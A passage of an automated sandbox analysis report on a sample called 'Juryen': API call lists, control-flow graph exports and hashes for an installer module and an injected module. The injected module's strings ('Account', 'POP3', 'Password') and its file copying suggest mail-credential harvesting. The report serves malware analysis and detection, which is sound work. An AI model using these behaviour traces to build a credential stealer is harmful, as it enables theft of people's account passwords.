                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004054C3
                                                                    • ShowWindow.USER32(?,00000000), ref: 00405511
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040551C
                                                                    • ShowWindow.USER32(00000000), ref: 00405523
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 2564846305-813528018
                                                                    • Opcode ID: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction ID: 4e4e2263315175f506fe38719dbb0ef9e1096acd748b53dfdf66ec3fe5014b92
                                                                    • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                    • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18

                                                                    Control-flow Graph (text export of the graph image: each entry gives the node id, the basic-block address range and the APIs called in that block; a->b marks an edge from node a to node b; the executed / not-executed colouring of the rendered graph is not preserved in this export)
                                                                    control_flow_graph 464 403fc1-403fd3 465 403fd9-403fdf 464->465 466 40413a-404149 464->466 465->466 467 403fe5-403fee 465->467 468 404198-4041ad 466->468 469 40414b-404193 GetDlgItem * 2 call 4044c0 SetClassLongW call 40140b 466->469 472 403ff0-403ffd SetWindowPos 467->472 473 404003-40400a 467->473 470 4041ed-4041f2 call 40450c 468->470 471 4041af-4041b2 468->471 469->468 483 4041f7-404212 470->483 475 4041b4-4041bf call 401389 471->475 476 4041e5-4041e7 471->476 472->473 478 40400c-404026 ShowWindow 473->478 479 40404e-404054 473->479 475->476 500 4041c1-4041e0 SendMessageW 475->500 476->470 482 40448d 476->482 484 404127-404135 call 404527 478->484 485 40402c-40403f GetWindowLongW 478->485 486 404056-404068 DestroyWindow 479->486 487 40406d-404070 479->487 494 40448f-404496 482->494 491 404214-404216 call 40140b 483->491 492 40421b-404221 483->492 484->494 485->484 493 404045-404048 ShowWindow 485->493 495 40446a-404470 486->495 497 404072-40407e SetWindowLongW 487->497 498 404083-404089 487->498 491->492 504 404227-404232 492->504 505 40444b-404464 DestroyWindow EndDialog 492->505 493->479 495->482 503 404472-404478 495->503 497->494 498->484 499 40408f-40409e GetDlgItem 498->499 506 4040a0-4040b7 SendMessageW IsWindowEnabled 499->506 507 4040bd-4040c0 499->507 500->494 503->482 508 40447a-404483 ShowWindow 503->508 504->505 509 404238-404285 call 40657e call 4044c0 * 3 GetDlgItem 504->509 505->495 506->482 506->507 510 4040c2-4040c3 507->510 511 4040c5-4040c8 507->511 508->482 536 404287-40428c 509->536 537 40428f-4042cb ShowWindow EnableWindow call 4044e2 EnableWindow 509->537 513 4040f3-4040f8 call 404499 510->513 514 4040d6-4040db 511->514 515 4040ca-4040d0 511->515 513->484 518 404111-404121 SendMessageW 514->518 520 4040dd-4040e3 514->520 515->518 519 4040d2-4040d4 515->519 518->484 519->513 524 4040e5-4040eb call 40140b 520->524 525 4040fa-404103 call 40140b 520->525 534 4040f1 524->534 
525->484 533 404105-40410f 525->533 533->534 534->513 536->537 540 4042d0 537->540 541 4042cd-4042ce 537->541 542 4042d2-404300 GetSystemMenu EnableMenuItem SendMessageW 540->542 541->542 543 404302-404313 SendMessageW 542->543 544 404315 542->544 545 40431b-40435a call 4044f5 call 403fa2 call 406541 lstrlenW call 40657e SetWindowTextW call 401389 543->545 544->545 545->483 556 404360-404362 545->556 556->483 557 404368-40436c 556->557 558 40438b-40439f DestroyWindow 557->558 559 40436e-404374 557->559 558->495 560 4043a5-4043d2 CreateDialogParamW 558->560 559->482 561 40437a-404380 559->561 560->495 562 4043d8-40442f call 4044c0 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 560->562 561->483 563 404386 561->563 562->482 568 404431-404449 ShowWindow call 40450c 562->568 563->482 568->495
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FFD
                                                                    • ShowWindow.USER32(?), ref: 0040401D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040402F
                                                                    • ShowWindow.USER32(?,00000004), ref: 00404048
                                                                    • DestroyWindow.USER32 ref: 0040405C
                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404075
                                                                    • GetDlgItem.USER32(?,?), ref: 00404094
                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040A8
                                                                    • IsWindowEnabled.USER32(00000000), ref: 004040AF
                                                                    • GetDlgItem.USER32(?,00000001), ref: 0040415A
                                                                    • GetDlgItem.USER32(?,00000002), ref: 00404164
                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040417E
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041CF
                                                                    • GetDlgItem.USER32(?,00000003), ref: 00404275
                                                                    • ShowWindow.USER32(00000000,?), ref: 00404296
                                                                    • EnableWindow.USER32(?,?), ref: 004042A8
                                                                    • EnableWindow.USER32(?,?), ref: 004042C3
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042D9
                                                                    • EnableMenuItem.USER32(00000000), ref: 004042E0
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042F8
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040430B
                                                                    • lstrlenW.KERNEL32(00422F08,?,00422F08,00000000), ref: 00404335
                                                                    • SetWindowTextW.USER32(?,00422F08), ref: 00404349
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040447D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                    • String ID:
                                                                    • API String ID: 1860320154-0
                                                                    • Opcode ID: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction ID: f4824fcfb4375dbde2e3aa314f90dcffafac0cdac9d9fdfce080a9e5a5e1030c
                                                                    • Opcode Fuzzy Hash: 4b3fe02cb5795506d30df4e66f46237e59566fdbff82c58b44480cf0eb866077
                                                                    • Instruction Fuzzy Hash: E7C1CEB1600200BBCB216F61EE49E2B3A68FB95719F41053EF751B11F0CB795882DB2E

                                                                    Control-flow Graph (text export of the graph image: each entry gives the node id, the basic-block address range and the APIs called in that block; a->b marks an edge from node a to node b; the executed / not-executed colouring of the rendered graph is not preserved in this export)
                                                                    control_flow_graph 571 403c13-403c2b call 406935 574 403c2d-403c3d call 406488 571->574 575 403c3f-403c76 call 40640f 571->575 584 403c99-403cc2 call 403ee9 call 405f18 574->584 580 403c78-403c89 call 40640f 575->580 581 403c8e-403c94 lstrcatW 575->581 580->581 581->584 589 403d54-403d5c call 405f18 584->589 590 403cc8-403ccd 584->590 596 403d6a-403d8f LoadImageW 589->596 597 403d5e-403d65 call 40657e 589->597 590->589 592 403cd3-403cfb call 40640f 590->592 592->589 598 403cfd-403d01 592->598 600 403e10-403e18 call 40140b 596->600 601 403d91-403dc1 RegisterClassW 596->601 597->596 602 403d13-403d1f lstrlenW 598->602 603 403d03-403d10 call 405e3d 598->603 614 403e22-403e2d call 403ee9 600->614 615 403e1a-403e1d 600->615 604 403dc7-403e0b SystemParametersInfoW CreateWindowExW 601->604 605 403edf 601->605 609 403d21-403d2f lstrcmpiW 602->609 610 403d47-403d4f call 405e10 call 406541 602->610 603->602 604->600 608 403ee1-403ee8 605->608 609->610 613 403d31-403d3b GetFileAttributesW 609->613 610->589 617 403d41-403d42 call 405e5c 613->617 618 403d3d-403d3f 613->618 624 403e33-403e4d ShowWindow call 4068c5 614->624 625 403eb6-403ebe call 405699 614->625 615->608 617->610 618->610 618->617 630 403e59-403e6b GetClassInfoW 624->630 631 403e4f-403e54 call 4068c5 624->631 632 403ec0-403ec6 625->632 633 403ed8-403eda call 40140b 625->633 636 403e83-403eb4 DialogBoxParamW call 40140b call 403b63 630->636 637 403e6d-403e7d GetClassInfoW RegisterClassW 630->637 631->630 632->615 638 403ecc-403ed3 call 40140b 632->638 633->605 636->608 637->636 638->615
                                                                    APIs
                                                                      • Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
                                                                      • Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962
                                                                    • lstrcatW.KERNEL32(00436000,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420,00436800,00000000,00434000,00008001), ref: 00403C94
                                                                    • lstrlenW.KERNEL32(004279C0,?,?,?,004279C0,00000000,00434800,00436000,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000,00000002,771B3420), ref: 00403D14
                                                                    • lstrcmpiW.KERNEL32(004279B8,.exe,004279C0,?,?,?,004279C0,00000000,00434800,00436000,00422F08,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F08,00000000), ref: 00403D27
                                                                    • GetFileAttributesW.KERNEL32(004279C0), ref: 00403D32
                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00434800), ref: 00403D7B
                                                                      • Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403DB8
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DD0
                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E05
                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403E3B
                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004289C0), ref: 00403E67
                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004289C0), ref: 00403E74
                                                                    • RegisterClassW.USER32(004289C0), ref: 00403E7D
                                                                    • DialogBoxParamW.USER32(?,00000000,00403FC1,00000000), ref: 00403E9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-1115850852
                                                                    • Opcode ID: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction ID: 5b9c441e0465166458f669e0e2db1e5d0b29f952519833dd96bf398df7fa21fd
                                                                    • Opcode Fuzzy Hash: 5037b0ac7b0afaf53c36cfd73c50730ff94dd9e4d82060fed1f88605cc91a9c7
                                                                    • Instruction Fuzzy Hash: E661D570600300BAD620AF66DD46F3B3A7CEB84B49F81453FF941B61E2CB795952CA6D

                                                                    Control-flow Graph (text export of the graph image: each entry gives the node id, the basic-block address range and the APIs called in that block; a->b marks an edge from node a to node b; the executed / not-executed colouring of the rendered graph is not preserved in this export)
                                                                    control_flow_graph 645 40467f-404691 646 4047b1-4047be 645->646 647 404697-40469f 645->647 648 4047c0-4047c9 646->648 649 40481b-40481f 646->649 650 4046a1-4046b0 647->650 651 4046b2-4046d6 647->651 654 4048f4 648->654 655 4047cf-4047d5 648->655 652 4048e5-4048ec 649->652 653 404825-40483d GetDlgItem 649->653 650->651 656 4046d8 651->656 657 4046df-40475a call 4044c0 * 2 CheckDlgButton call 4044e2 GetDlgItem call 4044f5 SendMessageW 651->657 652->654 659 4048ee 652->659 661 4048a6-4048ad 653->661 662 40483f-404846 653->662 660 4048f7-4048fe call 404527 654->660 655->654 663 4047db-4047e6 655->663 656->657 687 404765-4047ac SendMessageW * 2 lstrlenW SendMessageW * 2 657->687 688 40475c-40475f GetSysColor 657->688 659->654 670 404903-404907 660->670 661->660 667 4048af-4048b6 661->667 662->661 666 404848-404863 662->666 663->654 668 4047ec-404816 GetDlgItem SendMessageW call 4044e2 call 40490a 663->668 666->661 671 404865-4048a3 SendMessageW LoadCursorW SetCursor call 40492e LoadCursorW SetCursor 666->671 667->660 672 4048b8-4048bc 667->672 668->649 671->661 677 4048ce-4048d2 672->677 678 4048be-4048cc SendMessageW 672->678 682 4048e0-4048e3 677->682 683 4048d4-4048de SendMessageW 677->683 678->677 682->670 683->682 687->670 688->687
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                    • GetSysColor.USER32(?), ref: 0040475F
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                    • lstrlenW.KERNEL32(?), ref: 00404780
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                    • SendMessageW.USER32(00000000), ref: 00404802
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                    • SetCursor.USER32(00000000), ref: 00404881
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                    • SetCursor.USER32(00000000), ref: 0040489D
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: N
                                                                    • API String ID: 3103080414-1130791706
                                                                    • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                    • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                    • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 1F751CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D1B
                                                                      • Part of subcall function 1F751CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1F751D37
                                                                      • Part of subcall function 1F751CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F751D4B
                                                                    • _strlen.LIBCMT ref: 1F751855
                                                                    • _strlen.LIBCMT ref: 1F751869
                                                                    • _strlen.LIBCMT ref: 1F75188B
                                                                    • _strlen.LIBCMT ref: 1F7518AE
                                                                    • _strlen.LIBCMT ref: 1F7518C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                    • API String ID: 3296212668-3023110444
                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction ID: ee42c1fabca43c8cb2b981c440c683e12015de73367f40d0dfef61e0856680d6
                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                    • Instruction Fuzzy Hash: 92610475D00358ABEF15CBA4F844BDEB7B9AF45309F00415AD104AB274EBB47A45CF92

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                    • API String ID: 4218353326-230879103
                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction ID: 597c4213dc94dff58d370ff3411a39f5ac0dd639f4892531270d6eb8f515586e
                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                    • Instruction Fuzzy Hash: 937108B5D003695BDF119FF4AC98AEF7BFC9F09201F104096E548E7251E674AB89CBA0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                    • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                    • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                    APIs
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                    • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                      • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                    • wsprintfA.USER32 ref: 00406206
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                      • Part of subcall function 00406031: GetFileAttributesW.KERNEL32(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                      • Part of subcall function 00406031: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                    • String ID: %ls=%ls$[Rename]
                                                                    • API String ID: 2171350718-461813615
                                                                    • Opcode ID: 3cd7194a84b85a053e31ee19696a447fece43685b985ba60a20dd83e8f5070ac
                                                                    • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                    • Opcode Fuzzy Hash: 3cd7194a84b85a053e31ee19696a447fece43685b985ba60a20dd83e8f5070ac
                                                                    • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 1F757D06
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7590D7
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7590E9
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7590FB
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75910D
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75911F
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759131
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759143
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759155
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759167
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F759179
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75918B
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F75919D
                                                                      • Part of subcall function 1F7590BA: _free.LIBCMT ref: 1F7591AF
                                                                    • _free.LIBCMT ref: 1F757CFB
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F757D1D
                                                                    • _free.LIBCMT ref: 1F757D32
                                                                    • _free.LIBCMT ref: 1F757D3D
                                                                    • _free.LIBCMT ref: 1F757D5F
                                                                    • _free.LIBCMT ref: 1F757D72
                                                                    • _free.LIBCMT ref: 1F757D80
                                                                    • _free.LIBCMT ref: 1F757D8B
                                                                    • _free.LIBCMT ref: 1F757DC3
                                                                    • _free.LIBCMT ref: 1F757DCA
                                                                    • _free.LIBCMT ref: 1F757DE7
                                                                    • _free.LIBCMT ref: 1F757DFF
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 98837085d018d74e861ff20b0537a1f44af1f35d363f8a6426e9cf8b01730c5a
                                                                    • Instruction ID: e43ecd8506d18ed29b8c18c3b0cfa184302b17a0dc95410a94970c102a0fe9c1
                                                                    • Opcode Fuzzy Hash: 98837085d018d74e861ff20b0537a1f44af1f35d363f8a6426e9cf8b01730c5a
                                                                    • Instruction Fuzzy Hash: 8C317335500349DFEB119A38E944BA6F7EAEF44214F114969E849DB270EF75F881C750
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A00
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A2A
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404ADB
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AE6
                                                                    • lstrcmpiW.KERNEL32(004279C0,00422F08,00000000,?,?), ref: 00404B18
                                                                    • lstrcatW.KERNEL32(?,004279C0), ref: 00404B24
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B36
                                                                      • Part of subcall function 00405B85: GetDlgItemTextW.USER32(?,?,00000400,00404B6D), ref: 00405B98
